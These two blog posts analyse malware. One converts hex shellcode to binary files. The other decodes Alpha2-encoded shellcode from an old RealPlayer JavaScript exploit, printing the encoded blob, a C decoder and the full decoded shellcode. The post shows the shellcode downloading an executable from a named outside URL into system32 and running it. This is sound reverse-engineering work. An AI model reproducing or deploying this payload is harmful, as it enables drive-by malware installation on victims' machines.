Wednesday, 21 August 2013

Convert hex shellcode to binary mode

To convert hex shellcode to binary files, a couple of easy ways can do that. Say we have hex mode strings below:
\x38\x12\x08\xab
  • Bash:
echo -ne "\x38\x12\x08\xab" > b.bin
  •  Perl:
perl -e 'print "\x38\x12\x08\xab"' > p.bin 
  • online tools such as http://sandsprite.com/shellcode_2_exe.php
 VI could be used to edit the hex of the binary files with ":%!xxd". But actually VI doesn't support hex edit, what it does is just redirect it to xxd command. However, the xxd command might add a newline character, "\n"(ASCII 0A) at the end.
On the screenshot above, the "\x0a" was added by xxd command, if it was opened with a hex editor, it didn't exist. To save the modification, need to convert it back from Hexdump first, ":%!xxd -r", and then save it.

The python command below could also convert hex to binary file, but the annoying thing is it will add a newline character, "\n"(ASCII 0A) at the end of the file. Haven't figured out how to avoid it yet.
python -c 'print "\x38\x12\x08\xab"' >py.bin

Monday, 12 August 2013

Decode the shell code encoded by Alpha2

This is an old JavaScript exploit code within a web page was targeting Real player, and it contained shellcode that was encoded.


A little Google search indicated it was an open source encoding program for shellcode, Alpha2 , which source code was available. According to the source code, the strings below were prefix to the encoded shellcode and should be removed when decoding it.
"TYIIIIIIIIIIIIIIII7QZ" mixedcase_ascii_decoder_body
mixedcase_ascii_decoder_body   "jAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI"
Then we got the shellcode below:
xkR0qJPJP3YY0fNYwLEQk0p47zpfKRKJJKVe9xJKYoIoYolOoCQv3VsVwLuRKwRvavbFQvJMWVsZzMFv0z8K8mwVPnxmmn8mDUBzJMEBsHuN3ULUhmfxW6peMMZM7XPrf5NkDpP107zMpYE5MMzMj44LqxGONuKpTRrNWOVYM5mqqrwSMTnoeoty08JMnKJMgPw2pey5MgMWQuMwrunOgp8mpn8m7PrZBEleoWng2DRELgZMU6REoUJMmLHmz1KUOPCXHmLvflsRWOLNvVrFPfcVyumpRKp4dpJ9VQMJUlxmmnTL2GWOLNQKe6pfQvXeMpPuVPwP9v0XzFr3Ol9vRpzFDxm5NjqVxmLzdLSvTumI5alJMqqrauWJUWrhS3OQWRU5QrENVcE61vPUOVtvTv4uP0DvLYfQOjZMoJP6eeMIvQmF5fLYP1nrQEmvyZkSnFtSooFWTtTpp5oinTWLgOzmMTk8PUoVNENnW0J9mInyWQS3TRGFVt6iEUTgtBwrtTs3r5r5PfEqTCuBgEGoDUtR4CfkvB4OEDc3UUGbVib4Wo5we6VQVouXdcENeStEpfTc7nVoUBdrfnvts3c77r3VwZwyGw7rdj4OS4DTww6tuOUw2F4StTUZvkFiwxQvtsud7Z6BviR1gxUZ4IVgTBfRWygPfouZtCwWqvRHptd4RPFZVOdoRWQgrWTnRK0o6QVQ08Tne3pnTo1htnqu2XPeMPGp 

Since the source code was available, I wrote a small program in C to decode it:
 #include <stdio.h>
#include <stdlib.h>
int main(int argc, char argv[], char envp[]) {
  int   i, ii, A, B, D, E, F;
  char c;
  while ((i = getchar()) != EOF) {
        ii = getchar();
        D = (i & 0x0f);
        E = (ii & 0xf0) >> 4;
        F = (ii & 0x0f);
        A = D^E;
        B = F;
    printf("\\x%X%X", A, B);
  }
  exit(EXIT_SUCCESS);
}
After decoding, we could get the decoded shell code:
\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x3C\x01\x80\x34\x0A\x66\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF\x8F\xB3\x66\x66\x66\x3C\x02\xC7\x56\x66\x66\x66\xED\x26\x6A\xED\x16\x7A\xCB\xED\x26\x6E\xED\xBE\xED\x15\x5A\xED\x12\x78\x1E\x65\x95\xED\x18\x46\x65\x9D\xED\x28\x72\x55\x8B\x30\x31\x37\xED\x59\x65\x9D\xED\x94\x0C\x68\x3F\x95\xC0\x12\x6E\x3F\x39\xE5\xA1\x62\x23\x84\x8F\x3F\x39\x38\xED\xAB\xED\x20\x42\x65\xA5\xB7\x87\x65\xA7\x55\xAF\x00\xED\x6E\xED\x20\x7A\x65\xA5\xA7\x87\x64\x65\xA7\xED\x66\x65\xA5\xED\x9C\xED\x91\xE5\xA0\x68\xED\xB6\x0C\x62\x3F\x8E\x36\x66\x66\x66\xE5\xA0\x6B\x34\x30\x99\x31\x9A\x3C\xED\xBE\x0C\x67\x3F\x8E\x5B\x66\x66\x66\xE5\xA0\x75\x30\x20\xE6\x58\xE6\x13\x9C\xE6\x50\xE6\x38\xE5\x8A\x46\xED\xBA\x0C\x46\x35\x99\x31\x8A\xA1\x62\x65\x3A\x07\x48\x03\xA1\x22\x65\x62\x1E\x03\x66\x66\x55\xA6\x36\x36\x35\x30\x36\x99\x31\x9A\xED\xBA\x36\x35\x99\x31\x96\x36\x99\x31\x92\x55\xA6\xCA\xE3\xA6\x13\x9F\x37\x34\x30\x35\x99\xB4\x3C\x3F\xCD\x84\x88\x55\xA6\xA5\x8E\x40\x99\x99\x99\x21\x03\x12\x36\x14\x09\x05\x27\x02\x02\x14\x03\x15\x15\x66\x21\x03\x12\x35\x1F\x15\x12\x03\x0B\x22\x0F\x14\x03\x05\x12\x09\x14\x1F\x27\x66\x31\x0F\x08\x23\x1E\x03\x05\x66\x23\x1E\x0F\x12\x32\x0E\x14\x03\x07\x02\x66\x2A\x09\x07\x02\x2A\x0F\x04\x14\x07\x14\x1F\x27\x66\x13\x14\x0A\x0B\x09\x08\x66\x33\x34\x2A\x22\x09\x11\x08\x0A\x09\x07\x02\x32\x09\x20\x0F\x0A\x03\x27\x66\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x6B\x6F\x31\x31\x38\x2E\x63\x6E\x2F\x78\x2E\x65\x78\x65\x80\x00 
 This could be converted to an executable file with shellcode_2_exe, and then run the executable on Ollydbg. As we can see, the shell code was still encrypted, and the first thing it would do was to decode the other part of the codes, 13CH bytes(from 00401017) totally, by “XOR 66H".

Then we got the decrypted shell code. The remaining shell code would call the function UrlDownloadToFile to download a file from http://www.ko118.cn/x.exe and save it to C:\WINDOWS\system32\a.exe, and then call WinExec to run the file a.exe.



The a.exe probably was a downloader which would download more trojans from the Internet.